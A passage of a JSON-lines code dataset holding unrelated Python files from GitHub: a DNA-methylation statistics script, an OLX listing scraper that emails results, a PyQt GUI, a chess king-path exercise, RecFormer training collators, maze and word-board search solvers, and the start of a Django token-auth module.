data_params_other\n)\n\ncpgs_unn = list(set(config_unn.cpg_list).intersection(config_unn.base_dict.keys()))\ncpgs_other = list(set(config_other.cpg_list).intersection(config_other.base_dict.keys()))\ncommon_cpgs = list(set(cpgs_unn).intersection(set(cpgs_other)))\n\nmetrics = [\n 'item',\n 'aux_unn',\n 'aux_other',\n 'corr_coeff',\n 'p_value',\n 'p_value_benjamini_hochberg',\n 'p_value_bonferroni'\n]\nresult = {}\nfor key in metrics:\n result[key] = []\n\nfor cpg_id, cpg in tqdm(enumerate(common_cpgs), mininterval=60.0, desc='cpgs_processing'):\n betas_unn = config_unn.base_data[config_unn.base_dict[cpg], config_unn.attributes_indexes]\n label_unn = [1] * len(betas_unn)\n betas_other = config_other.base_data[config_other.base_dict[cpg], config_other.attributes_indexes]\n label_other = [0] * len(betas_other)\n betas_all = np.concatenate((betas_unn, betas_other), axis=0)\n label_all = np.asarray(label_unn + label_other)\n\n if len(set(label_all)) != 2:\n raise RuntimeError('x variable is not binary in pbc')\n\n corr_coeff, p_value = pointbiserialr(label_all, betas_all)\n\n result['corr_coeff'].append(corr_coeff)\n result['p_value'].append(p_value)\n\n result['item'].append(cpg)\n aux = ''\n if cpg in config_unn.cpg_gene_dict:\n aux = ';'.join(config_unn.cpg_gene_dict[cpg])\n result['aux_unn'].append(aux)\n aux = ''\n if cpg in config_other.cpg_gene_dict:\n aux = ';'.join(config_other.cpg_gene_dict[cpg])\n result['aux_other'].append(aux)\n\npvals = np.asarray(result['p_value'])\nreject, pvals_corr, alphacSidak, alphacBonf = multipletests(\n pvals,\n 0.05,\n method='fdr_bh'\n)\nresult['p_value_benjamini_hochberg'] = pvals_corr\n\nreject, pvals_corr, alphacSidak, alphacBonf = multipletests(\n pvals,\n 0.05,\n method='bonferroni'\n)\nresult['p_value_bonferroni'] = pvals_corr\n\nsave_table_dict_xlsx(f'{save_path}/pbc_vs_GSE87571', result)\n","repo_name":"GillianGrayson/dna-methylation","sub_path":"dna-methylation/unn_epic/dataset_specific.py","file_name":"dataset_specific.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24655054544","text":"import requests\nfrom typing import List, Dict, Optional, Tuple, Generator\nimport json\nfrom dataclasses import dataclass\nimport datetime\nimport os\nimport smtplib\nimport pandas\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.application import MIMEApplication\n\n# Check README.md for a guide to how to get an url for specified category, location and other filters that you need\nURLS_TO_SCRAPE = {\n \"Łódź mieszkania wynajem\": \"https://www.olx.pl/api/v1/offers/?offset=40&limit=40&category_id=15&sort_by=created_at%3Adesc&filter_refiners=spell_checker&sl=18ae25cfa80x3938008f\",\n\n}\n\n# Email configuration\n# Add env variables to AWS Lambda environment variables - guide in README.md\n# This configuration is used for sending emails by using Gmail\nsmtp_server = \"smtp.gmail.com\"\nsmtp_port = 587\nsmtp_username = os.environ[\"SMTP_USERNAME\"]\nsmtp_password = os.environ[\"SMTP_PASSWORD\"]\nfrom_email = os.environ[\"FROM_EMAIL\"]\nto_email = os.environ[\"TO_EMAIL\"]\n\n# The number of days from which offers are to come\nDAY_DELAY: int = 1\n\n\n@dataclass\nclass Params:\n name: str\n label: str\n\n\n@dataclass\nclass Price:\n value: float\n currency: str\n\n\n@dataclass\nclass Object:\n url: str\n title: str\n created_time: datetime.datetime\n city: Optional[str] = None\n district: Optional[str] = None\n region: Optional[str] = None\n price: Optional[Price] = None\n params: Optional[List[Params]] = None\n\n\nclass GetOlxContent:\n \"\"\"\n The `GetOlxContent` class is used to fetch content from the OLX website.\n\n Attributes:\n main_url (str): The main URL of the OLX website.\n\n Methods:\n fetch_content() -> List[Dict]: Fetches the content from the OLX website and returns it as a list of dictionaries.\n get_next_page_url(json_data) -> Optional[str]: Extracts the URL of the next page from the given JSON data.\n\n \"\"\"\n\n def __init__(self, url: str):\n self.main_url = url\n\n def fetch_content(self) -> List[Dict]:\n result = []\n\n while self.main_url:\n try:\n response = requests.get(self.main_url)\n if response.status_code == 200:\n json_data = json.loads(response.content)\n if not json_data:\n break\n\n # Add scraped data to list\n result.append(json_data)\n self.main_url = self.get_next_page_url(json_data)\n\n except Exception as e:\n print(e)\n\n return result\n\n @staticmethod\n def get_next_page_url(json_data) -> Optional[str]:\n links = json_data.get(\"links\")\n if links:\n next_page = links.get(\"next\")\n if next_page:\n return next_page.get(\"href\")\n\n return None\n\n\ndef send_email(filename: str, subject: str) -> None:\n \"\"\"\n Sends an email with an attachment using the given parameters. The email is sent from the 'from_email' address to the 'to_email' address.\n \"\"\"\n message = MIMEMultipart()\n message[\"From\"] = from_email\n message[\"To\"] = to_email\n message[\"Subject\"] = subject\n\n with open(filename, \"rb\") as file:\n attachment = MIMEApplication(file.read())\n attachment.add_header(\"Content-Disposition\", \"attachment\", filename=filename)\n message.attach(attachment)\n\n with smtplib.SMTP(smtp_server, smtp_port) as server:\n server.starttls()\n server.login(smtp_username, smtp_password)\n server.sendmail(from_email, to_email, message.as_string())\n\n\ndef parse_params(params) -> Tuple[List[Optional[Params]], Optional[Price]]:\n \"\"\"\n Parse the given params to create a list of Params objects and extract the Price object.\n\n :param params: A list of dictionaries representing the params.\n :return: A tuple containing the list of Params objects and the Price object.\n \"\"\"\n params_list = []\n price = None\n\n for param in params:\n key, label = param[\"key\"], param[\"value\"][\"label\"]\n if key == \"price\":\n price = Price(\n value=param.get(\"value\", {}).get(\"value\"),\n currency=param.get(\"value\", {}).get(\"currency\"),\n )\n\n params_list.append(\n Params(\n name=key,\n label=label\n )\n )\n\n return params_list, price\n\n\ndef parse_data(data: List[Dict]) -> Generator[Object, None, None]:\n \"\"\"\n This method `parse_data` takes a list of dictionaries as input and returns a generator object. Each dictionary in the input list represents an item, and within that item, there is a nested \"data\" key which contains a list of offers. Each offer is further processed using the `parse_params` function to extract parameters and price.\n\n :param data: A list of dictionaries representing items, with each item containing a \"data\" key which contains a list of offers.\n :return: A generator object that yields instances of the Object class.\n \"\"\"\n for item in data:\n for offer in item[\"data\"]:\n params, price = parse_params(offer[\"params\"])\n\n yield Object(\n url=offer[\"url\"],\n title=offer[\"title\"],\n created_time=offer[\"created_time\"],\n city=offer.get(\"location\", {}).get(\"city\", {}).get(\"name\"),\n district=offer.get(\"location\", {}).get(\"district\", {}).get(\"name\"),\n region=offer.get(\"location\", {}).get(\"region\", {}).get(\"name\"),\n price=price,\n params=params\n )\n\n\ndef scrape(name, url_to_scrape) -> None:\n \"\"\"\n Scrape data from a given URL and save it to an Excel file.\n\n :param name: The name of the scrape.\n :param url_to_scrape: The URL to scrape data from.\n :return: None\n \"\"\"\n scraper = GetOlxContent(url_to_scrape)\n data = scraper.fetch_content()\n objects = parse_data(data)\n\n dicts = []\n for idx, object_ in enumerate(objects):\n params_dict = {}\n for param in object_.params:\n params_dict[param.name] = param.label\n\n dicts.append(\n {\n \"url\": object_.url,\n \"title\": object_.title,\n \"created_time\": object_.created_time,\n \"city\": object_.city if object_.city else None,\n \"district\": object_.district if object_.district else None,\n \"region\": object_.region if object_.region else None,\n \"price_val\": object_.price.value if object_.price else None,\n \"price_cur\": object_.price.currency if object_.price else None,\n **params_dict,\n }\n )\n\n df = pandas.DataFrame(dicts)\n df.to_excel(\"/tmp/olx.xlsx\", index=False)\n\n send_email(filename=\"/tmp/olx.xlsx\", subject=name)\n\n\ndef run() -> bool:\n \"\"\"\n Executes the scraping process for each URL provided in the `URLS_TO_SCRAPE` dictionary.\n \"\"\"\n for name, url_to_scrape in URLS_TO_SCRAPE.items():\n print(f\"Start scraping {name}...\")\n scrape(name, url_to_scrape)\n\n return True\n\n\ndef lambda_handler(event, context):\n return {\n 'statusCode': 200,\n 'body': json.dumps({\"message\": \"Scraped\", \"status\": run()})\n }\n","repo_name":"DEENUU1/olx-notification","sub_path":"olx_notification/compute/olx.py","file_name":"olx.py","file_ext":"py","file_size_in_byte":7222,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"44151144275","text":"from PyQt5 import QtCore\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, \\\n QGridLayout, QWidget, QPushButton, QMenuBar, QMenu, \\\n QStatusBar, QAction, QSizePolicy\nimport sys\nfrom visualtools import VisualTools\nfrom automatagrid import AutomataGrid\nfrom itemlist import ItemList\nfrom terminal import Terminal\n\n\nclass MainWindow(QMainWindow):\n\n def __init__(self, *args, **kwargs):\n super(MainWindow, self).__init__(*args, **kwargs)\n\n self.resize(1143, 732)\n self.setWindowTitle(\"FireDES\")\n\n self.centralWidget = QWidget(self)\n self.layout = QGridLayout(self.centralWidget)\n self.centralWidgetSetup()\n\n self.visualTools = VisualTools(self.centralWidget)\n self.layout.addWidget(self.visualTools, 0, 0)\n\n self.menuBarSetup()\n\n self.automataGrid = AutomataGrid(self.centralWidget)\n self.layout.addWidget(self.automataGrid, 0, 1)\n\n self.itemList = ItemList(self.centralWidget)\n self.layout.addWidget(self.itemList, 0, 2)\n\n self.terminal = Terminal(self.centralWidget)\n self.layout.addWidget(self.terminal, 1, 0, 1, 3)\n\n def centralWidgetSetup(self):\n self.setCentralWidget(self.centralWidget)\n sizePolicy = QSizePolicy(QSizePolicy.Maximum,\n QSizePolicy.Maximum)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(\n self.centralWidget.sizePolicy().hasHeightForWidth())\n self.centralWidget.setSizePolicy(sizePolicy)\n\n def menuBarSetup(self):\n self.menuFile = self.menuBar().addMenu(\"File\")\n self.menuEdit = self.menuBar().addMenu(\"Edit\")\n self.menuView = self.menuBar().addMenu(\"View\")\n self.menuTools = self.menuBar().addMenu(\"Tools\")\n self.menuRun = self.menuBar().addMenu(\"Run\")\n self.menuHelp = self.menuBar().addMenu(\"Help\")\n\ndef main():\n app = QApplication(sys.argv)\n main_window = MainWindow()\n main_window.show()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"aaamourao/FireDES_GUI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22188243777","text":"import time\nstartPos1 = input(\"Podaj pozycję startową króla np. A2 B4 \")\nendPos1 = input(\"Podaj końcową pozycję króla np. H7 E5 \")\nstartPos = [startPos1[0],int(startPos1[1])]\nendPos = [endPos1[0],int(endPos1[1])]\ncurrentPos = startPos\nileruchow = 0\njakieruchy = []\nstartime = time.time()\nif(startPos[1] > 8 or endPos[1] > 8):\n print(\"Za duża liczba\")\n exit()\n\ntranslatee = [\n {\"letter\": \"A\",\"number\": 1},\n {\"letter\": \"B\",\"number\": 2},\n {\"letter\": \"C\",\"number\": 3},\n {\"letter\": \"D\",\"number\": 4},\n {\"letter\": \"E\",\"number\": 5},\n {\"letter\": \"F\",\"number\": 6},\n {\"letter\": \"G\",\"number\": 7},\n {\"letter\": \"H\",\"number\": 8},\n]\n\nfor trans in translatee:\n if(trans[\"letter\"] == currentPos[0]):\n currentPos[0] = trans[\"number\"]\n if(trans[\"letter\"] == endPos[0]):\n endPos[0] = trans[\"number\"]\n\n\nwhile(1 == 1):\n if(currentPos[0] < endPos[0] and currentPos[1] < endPos[1]):\n currentPos[0] += 1\n currentPos[1] += 1\n jakieruchy.append(\"NE\")\n ileruchow +=1\n continue\n if(currentPos[0] > endPos[0] and currentPos[1] > endPos[1]):\n currentPos[0] -= 1\n currentPos[1] -= 1\n jakieruchy.append(\"SW\")\n ileruchow +=1\n continue\n if(currentPos[0] > endPos[0] and currentPos[1] < endPos[1]):\n currentPos[0] -= 1\n currentPos[1] += 1\n jakieruchy.append(\"NW\")\n ileruchow +=1\n continue\n if(currentPos[0] < endPos[0] and currentPos[1] > endPos[1]):\n currentPos[0] += 1\n currentPos[1] -= 1\n jakieruchy.append(\"SE\")\n ileruchow +=1\n continue\n if(currentPos[0] < endPos[0] and not currentPos[1] < endPos[1]):\n currentPos[0] += 1\n jakieruchy.append(\"E\")\n ileruchow +=1\n continue\n if(currentPos[1] < endPos[1] and not currentPos[0] < endPos[0]):\n currentPos[1] += 1\n jakieruchy.append(\"N\")\n ileruchow +=1\n continue\n if(currentPos[0] > endPos[0] and not currentPos[1] > endPos[1]):\n currentPos[0] -= 1\n jakieruchy.append(\"W\")\n ileruchow +=1\n continue\n if(currentPos[1] > endPos[1] and not currentPos[0] > endPos[0]):\n currentPos[1] -= 1\n jakieruchy.append(\"S\")\n ileruchow +=1\n continue\n\n\n if(currentPos[0] == endPos[0] and currentPos[1] == endPos[1]):\n break\n\nprint(ileruchow)\nfor ruch in jakieruchy:\n print(ruch,end= \" \")\nprint(\"\\n\")\nendtime = time.time()\nprint(\"Czas:\", endtime-startime+\"s\")\ninput()","repo_name":"Nskubix/Przygotowania","sub_path":"Czerwiec2023/PosuwanieKróla.py","file_name":"PosuwanieKróla.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14917660600","text":"from typing import Optional, Union, List, Dict, Tuple\nfrom dataclasses import dataclass\nfrom recformer import RecformerTokenizer\nimport torch\nimport unicodedata\nimport random\n\n\n# Data collator\n@dataclass\nclass PretrainDataCollatorWithPadding:\n\n tokenizer: RecformerTokenizer\n tokenized_items: Dict\n mlm_probability: float\n\n def __call__(self, batch_item_ids: List[Dict[str, Union[List[int], List[List[int]], torch.Tensor]]]) -> Dict[str, torch.Tensor]:\n\n '''\n features: A batch of list of item ids\n 1. sample training pairs\n 2. convert item ids to item features\n 3. mask tokens for mlm\n\n input_ids: (batch_size, seq_len)\n item_position_ids: (batch_size, seq_len)\n token_type_ids: (batch_size, seq_len)\n attention_mask: (batch_size, seq_len)\n global_attention_mask: (batch_size, seq_len)\n '''\n \n batch_item_seq_a, batch_item_seq_b = self.sample_pairs(batch_item_ids)\n batch_feature_a = self.extract_features(batch_item_seq_a)\n batch_feature_b = self.extract_features(batch_item_seq_b)\n\n batch_encode_features_a = self.encode_features(batch_feature_a)\n batch_encode_features_b = self.encode_features(batch_feature_b)\n batch_a = self.tokenizer.padding(batch_encode_features_a, pad_to_max=False)\n batch_b = self.tokenizer.padding(batch_encode_features_b, pad_to_max=False)\n\n batch_a[\"mlm_input_ids\"], batch_a[\"mlm_labels\"] = self.mask_mlm(batch_encode_features_a)\n batch_b[\"mlm_input_ids\"], batch_b[\"mlm_labels\"] = self.mask_mlm(batch_encode_features_b)\n\n batch = dict()\n\n for k, v in batch_a.items():\n batch[k+'_a'] = torch.LongTensor(v)\n \n for k, v in batch_b.items():\n batch[k+'_b'] = torch.LongTensor(v)\n\n return batch\n\n def sample_pairs(self, batch_item_ids):\n\n batch_item_seq_a = []\n batch_item_seq_b = []\n\n for item_ids in batch_item_ids:\n\n item_ids = item_ids['items']\n item_seq_len = len(item_ids)\n start = (item_seq_len-1) // 2\n target_pos = random.randint(start, item_seq_len-1)\n batch_item_seq_a.append(item_ids[:target_pos])\n batch_item_seq_b.append([item_ids[target_pos]])\n\n return batch_item_seq_a, batch_item_seq_b\n\n\n def extract_features(self, batch_item_seq):\n\n features = []\n\n for item_seq in batch_item_seq:\n feature_seq = []\n for item in item_seq:\n input_ids, token_type_ids = self.tokenized_items[item]\n feature_seq.append([input_ids, token_type_ids])\n features.append(feature_seq)\n\n return features\n\n def encode_features(self, batch_feature):\n \n features = []\n for feature in batch_feature:\n features.append(self.tokenizer.encode(feature, encode_item=False))\n\n return features\n\n def mask_mlm(self, flat_features):\n\n input_ids = [e[\"input_ids\"] for e in flat_features]\n\n batch_input = self._collate_batch(input_ids)\n\n mask_labels = []\n for e in flat_features:\n ref_tokens = []\n for id in e[\"input_ids\"]:\n token = self.tokenizer._convert_id_to_token(id)\n ref_tokens.append(token)\n\n mask_labels.append(self._whole_word_mask(ref_tokens))\n\n batch_mask = self._collate_batch(mask_labels)\n inputs, labels = self.mask_tokens(batch_input, batch_mask)\n\n return inputs, labels\n\n def _whole_word_mask(self, input_tokens: List[str], max_predictions=512):\n\n cand_indexes = []\n\n for (i, token) in enumerate(input_tokens):\n\n if token == self.tokenizer.bos_token or token == self.tokenizer.eos_token:\n continue\n\n if self._is_subword(token) and len(cand_indexes) > 0:\n cand_indexes[-1].append(i)\n else:\n cand_indexes.append([i])\n\n random.shuffle(cand_indexes)\n num_to_predict = min(max_predictions, max(1, int(round(len(input_tokens) * self.mlm_probability))))\n masked_lms = []\n covered_indexes = set()\n for index_set in cand_indexes:\n if len(masked_lms) >= num_to_predict:\n break\n # If adding a whole-word mask would exceed the maximum number of\n # predictions, then just skip this candidate.\n if len(masked_lms) + len(index_set) > num_to_predict:\n continue\n is_any_index_covered = False\n for index in index_set:\n if index in covered_indexes:\n is_any_index_covered = True\n break\n if is_any_index_covered:\n continue\n for index in index_set:\n covered_indexes.add(index)\n masked_lms.append(index)\n\n assert len(covered_indexes) == len(masked_lms)\n mask_labels = [1 if i in covered_indexes else 0 for i in range(len(input_tokens))]\n return mask_labels\n\n def _is_subword(self, token: str):\n if (\n not self.tokenizer.convert_tokens_to_string(token).startswith(\" \")\n and not self._is_punctuation(token[0])\n ):\n return True\n \n return False\n\n @staticmethod\n def _is_punctuation(char: str):\n # obtained from:\n # https://github.com/huggingface/transformers/blob/5f25a5f367497278bf19c9994569db43f96d5278/transformers/tokenization_bert.py#L489\n cp = ord(char)\n if (cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or (cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126):\n return True\n cat = unicodedata.category(char)\n if cat.startswith(\"P\"):\n return True\n return False\n\n\n def mask_tokens(self, inputs: torch.Tensor, mask_labels: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. Set\n 'mask_labels' means we use whole word mask (wwm), we directly mask idxs according to it's ref.\n \"\"\"\n\n if self.tokenizer.mask_token is None:\n raise ValueError(\n \"This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer.\"\n )\n labels = inputs.clone()\n # We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability defaults to 0.15 in Bert/RoBERTa)\n\n probability_matrix = mask_labels\n\n special_tokens_mask = [\n self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()\n ]\n probability_matrix.masked_fill_(torch.tensor(special_tokens_mask, dtype=torch.bool), value=0.0)\n if self.tokenizer._pad_token is not None:\n padding_mask = labels.eq(self.tokenizer.pad_token_id)\n probability_matrix.masked_fill_(padding_mask, value=0.0)\n\n masked_indices = probability_matrix.bool()\n labels[~masked_indices] = -100 # We only compute loss on masked tokens\n\n # 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])\n indices_replaced = torch.bernoulli(torch.full(labels.shape, 0.8)).bool() & masked_indices\n inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)\n\n # 10% of the time, we replace masked input tokens with random word\n indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced\n random_words = torch.randint(len(self.tokenizer), labels.shape, dtype=torch.long)\n inputs[indices_random] = random_words[indices_random]\n\n # The rest of the time (10% of the time) we keep the masked input tokens unchanged\n return inputs, labels\n\n\n def _collate_batch(self, examples, pad_to_multiple_of: Optional[int] = None):\n \"\"\"Collate `examples` into a batch, using the information in `tokenizer` for padding if necessary.\"\"\"\n # Tensorize if necessary.\n if isinstance(examples[0], (list, tuple)):\n examples = [torch.tensor(e, dtype=torch.long) for e in examples]\n\n # Check if padding is necessary.\n length_of_first = examples[0].size(0)\n are_tensors_same_length = all(x.size(0) == length_of_first for x in examples)\n if are_tensors_same_length and (pad_to_multiple_of is None or length_of_first % pad_to_multiple_of == 0):\n return torch.stack(examples, dim=0)\n\n # If yes, check if we have a `pad_token`.\n if self.tokenizer._pad_token is None:\n raise ValueError(\n \"You are attempting to pad samples but the tokenizer you are using\"\n f\" ({self.tokenizer.__class__.__name__}) does not have a pad token.\"\n )\n\n # Creating the full tensor and filling it with our data.\n max_length = max(x.size(0) for x in examples)\n if pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):\n max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of\n result = examples[0].new_full([len(examples), max_length], self.tokenizer.pad_token_id)\n for i, example in enumerate(examples):\n if self.tokenizer.padding_side == \"right\":\n result[i, : example.shape[0]] = example\n else:\n result[i, -example.shape[0] :] = example\n return result\n\n\n@dataclass\nclass FinetuneDataCollatorWithPadding:\n\n tokenizer: RecformerTokenizer\n tokenized_items: Dict\n\n def __call__(self, batch_item_ids: List[Dict[str, Union[List[int], List[List[int]], torch.Tensor]]]) -> Dict[str, torch.Tensor]:\n\n '''\n features: A batch of list of item ids\n 1. sample training pairs\n 2. convert item ids to item features\n 3. mask tokens for mlm\n\n input_ids: (batch_size, seq_len)\n item_position_ids: (batch_size, seq_len)\n token_type_ids: (batch_size, seq_len)\n attention_mask: (batch_size, seq_len)\n global_attention_mask: (batch_size, seq_len)\n '''\n \n batch_item_seq, labels = self.sample_train_data(batch_item_ids)\n batch_feature = self.extract_features(batch_item_seq)\n batch_encode_features = self.encode_features(batch_feature)\n batch = self.tokenizer.padding(batch_encode_features, pad_to_max=False)\n batch[\"labels\"] = labels\n\n for k, v in batch.items():\n batch[k] = torch.LongTensor(v)\n \n return batch\n\n def sample_train_data(self, batch_item_ids):\n\n batch_item_seq = []\n labels = []\n\n for item_ids in batch_item_ids:\n\n item_ids = item_ids['items']\n item_seq_len = len(item_ids)\n start = min(item_seq_len, 0)\n target_pos = random.randint(start, item_seq_len-1)\n batch_item_seq.append(item_ids[:target_pos])\n labels.append(item_ids[target_pos])\n\n return batch_item_seq, labels\n\n\n def extract_features(self, batch_item_seq):\n\n features = []\n\n for item_seq in batch_item_seq:\n feature_seq = []\n for item in item_seq:\n input_ids, token_type_ids = self.tokenized_items[item]\n feature_seq.append([input_ids, token_type_ids])\n features.append(feature_seq)\n\n return features\n\n def encode_features(self, batch_feature):\n \n features = []\n for feature in batch_feature:\n features.append(self.tokenizer.encode(feature, encode_item=False))\n\n return features\n\n\n@dataclass\nclass EvalDataCollatorWithPadding:\n\n tokenizer: RecformerTokenizer\n tokenized_items: Dict\n\n def __call__(self, batch_data: List[Dict[str, Union[int, List[int], List[List[int]], torch.Tensor]]]) -> Dict[str, torch.Tensor]:\n\n '''\n features: A batch of list of item ids\n 1. sample training pairs\n 2. convert item ids to item features\n 3. mask tokens for mlm\n\n input_ids: (batch_size, seq_len)\n item_position_ids: (batch_size, seq_len)\n token_type_ids: (batch_size, seq_len)\n attention_mask: (batch_size, seq_len)\n global_attention_mask: (batch_size, seq_len)\n '''\n \n batch_item_seq, labels = self.prepare_eval_data(batch_data)\n batch_feature = self.extract_features(batch_item_seq)\n batch_encode_features = self.encode_features(batch_feature)\n batch = self.tokenizer.padding(batch_encode_features, pad_to_max=False)\n\n for k, v in batch.items():\n batch[k] = torch.LongTensor(v)\n\n labels = torch.LongTensor(labels)\n \n return batch, labels\n\n def prepare_eval_data(self, batch_data):\n\n batch_item_seq = []\n labels = []\n\n for data_line in batch_data:\n\n item_ids = data_line['items']\n label = data_line['label']\n \n batch_item_seq.append(item_ids)\n labels.append(label)\n\n return batch_item_seq, labels\n\n\n def extract_features(self, batch_item_seq):\n\n features = []\n\n for item_seq in batch_item_seq:\n feature_seq = []\n for item in item_seq:\n input_ids, token_type_ids = self.tokenized_items[item]\n feature_seq.append([input_ids, token_type_ids])\n features.append(feature_seq)\n\n return features\n\n def encode_features(self, batch_feature):\n \n features = []\n for feature in batch_feature:\n features.append(self.tokenizer.encode(feature, encode_item=False))\n\n return features","repo_name":"AaronHeee/RecFormer","sub_path":"collator.py","file_name":"collator.py","file_ext":"py","file_size_in_byte":13853,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"78"} +{"seq_id":"33283285903","text":"import curses\nfrom curses import wrapper\nimport queue\nimport time\n\nmaze = [\n [\"#\", \"#\", \"#\", \"#\", \"#\", \"O\", \"#\", \"#\", \"#\"],\n [\"#\", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \"#\"],\n [\"#\", \" \", \"#\", \"#\", \" \", \"#\", \"#\", \" \", \"#\"],\n [\"#\", \" \", \"#\", \" \", \" \", \" \", \"#\", \" \", \"#\"],\n [\"#\", \" \", \"#\", \" \", \"#\", \" \", \"#\", \" \", \"#\"],\n [\"#\", \" \", \"#\", \" \", \"#\", \" \", \"#\", \" \", \"#\"],\n [\"#\", \" \", \"#\", \" \", \"#\", \" \", \"#\", \"#\", \"#\"],\n [\"#\", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \"#\"],\n [\"#\", \"#\", \"#\", \"#\", \"#\", \"#\", \"#\", \"X\", \"#\"]\n]\n\n\ndef display_maze(maze, stdscr, track=[]):\n GREEN = curses.color_pair(1)\n YELLOW = curses.color_pair(2)\n\n\n for i, row in enumerate(maze):\n for j, value in enumerate(row):\n if (i, j) in track:\n stdscr.addstr(i, j*2, \"X\", YELLOW)\n else:\n stdscr.addstr(i, j*2, value, GREEN)\n \n\n\n \ndef get_start(maze, start):\n for i, row in enumerate(maze):\n for j, value in enumerate(row):\n if value == start:\n return i, j\n\n return None\n\n\n\ndef get_track(maze, stdscr):\n start = \"O\"\n end = \"X\"\n start_point = get_start(maze, start)\n\n que = queue.Queue()\n que.put((start_point, [start_point]))\n\n visited = set()\n\n while not que.empty():\n current_point, track = que.get()\n r, c = current_point\n\n stdscr.clear()\n display_maze(maze, stdscr, track)\n time.sleep(0.2)\n stdscr.refresh()\n\n if maze[r][c] == end:\n return track\n\n neighbours = get_neighbours(maze, r, c)\n for neighbour in neighbours:\n if neighbour in visited:\n continue\n\n row, col = neighbour\n if maze[row][col] == \"#\":\n continue\n\n new_track = track + [neighbour]\n que.put((neighbour, new_track))\n visited.add(neighbour)\n\n\ndef get_neighbours(maze, row, column):\n neighbours = []\n\n if row > 0:\n neighbours.append((row-1, column))\n if row + 1 < len(maze):\n neighbours.append((row+1, column)) \n if column > 0:\n neighbours.append((row, column-1))\n if column + 1 < len(maze[0]):\n neighbours.append((row, column+1))\n\n return neighbours \n\n\ndef main(stdscr):\n curses.init_pair(1, curses.COLOR_GREEN, curses.COLOR_BLACK)\n curses.init_pair(2, curses.COLOR_YELLOW, curses.COLOR_BLACK)\n\n get_track(maze, stdscr)\n stdscr.getch()\n\n\nwrapper(main)\n","repo_name":"Adejumok/Track-Finder","sub_path":"track_finder.py","file_name":"track_finder.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3139764664","text":"# BOJ 2186\nimport sys\n\nsi = sys.stdin.readline\n\n\ndef dfs(x, y, idx):\n if dp[x][y][idx] > -1:\n return dp[x][y][idx]\n\n if idx >= len(word):\n return 1\n\n dp[x][y][idx] = 0\n for i in range(4):\n for j in range(1, k + 1):\n nx = x + j * dx[i]\n ny = y + j * dy[i]\n if nx < 0 or nx >= n or ny < 0 or ny >= m:\n continue\n\n if board[nx][ny] != word[idx]:\n continue\n\n dp[x][y][idx] += dfs(nx, ny, idx + 1)\n return dp[x][y][idx]\n\n\nn, m, k = map(int, si().split())\nboard = []\nfor _ in range(n):\n board.append(list(si().strip()))\n\nword = si().strip()\n\ndp = [[[-1 for _ in range(81)] for _ in range(101)] for _ in range(101)]\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\n\nres = 0\nfor i in range(n):\n for j in range(m):\n if board[i][j] == word[0]:\n res += dfs(i, j, 1)\nprint(res)","repo_name":"mrbartrns/algorithm-and-structure","sub_path":"BOJ/exaustive_search_boj/word_board_r2.py","file_name":"word_board_r2.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32319539666","text":"# -*- coding: utf-8 -*-\n\n\nimport datetime\nimport json\nimport time\n\nfrom django.db import transaction\nfrom rest_framework import exceptions\nfrom rest_framework.authentication import TokenAuthentication\n\nfrom Core.celeryTask import CeleryTask\nfrom Core.configs import *\nfrom Core.lib import *\nfrom Core.serializers import *\nfrom Data.data import IPaddress, Website\n\n\nclass BaseAuth(TokenAuthentication):\n def authenticate_credentials(self, key):\n # Search token in cache\n cache_user = cache.get(key)\n if cache_user:\n return cache_user, key\n\n model = self.get_model()\n try:\n token = model.objects.select_related('user').get(key=key)\n except model.DoesNotExist:\n raise exceptions.AuthenticationFailed()\n\n if not token.user.is_active:\n raise exceptions.AuthenticationFailed()\n\n time_now = datetime.datetime.now()\n\n if token.created < time_now - datetime.timedelta(minutes=EXPIRE_MINUTES):\n token.delete()\n raise exceptions.AuthenticationFailed()\n\n if token:\n # Cache token\n cache.set(key, token.user, EXPIRE_MINUTES * 60)\n\n return token.user, token\n\n\nclass CurrentUser(object):\n def __init__(self):\n pass\n\n @staticmethod\n def list(user):\n current_info = {\n 'name': user.username,\n 'avatar': 'user',\n 'userid': user.id,\n 'email': 'Toy4Recon',\n 'signature': '海纳百川,有容乃大',\n 'title': '安全专家',\n 'group': '某某某事业群-某某平台部-某某技术部-UED',\n 'tags': [\n {\n 'key': '0',\n 'label': '很有想法的',\n },\n {\n 'key': '5',\n 'label': '海纳百川',\n },\n ],\n 'notifyCount': 12,\n 'unreadCount': 0,\n 'country': 'China',\n 'geographic': {\n 'province': {\n 'label': 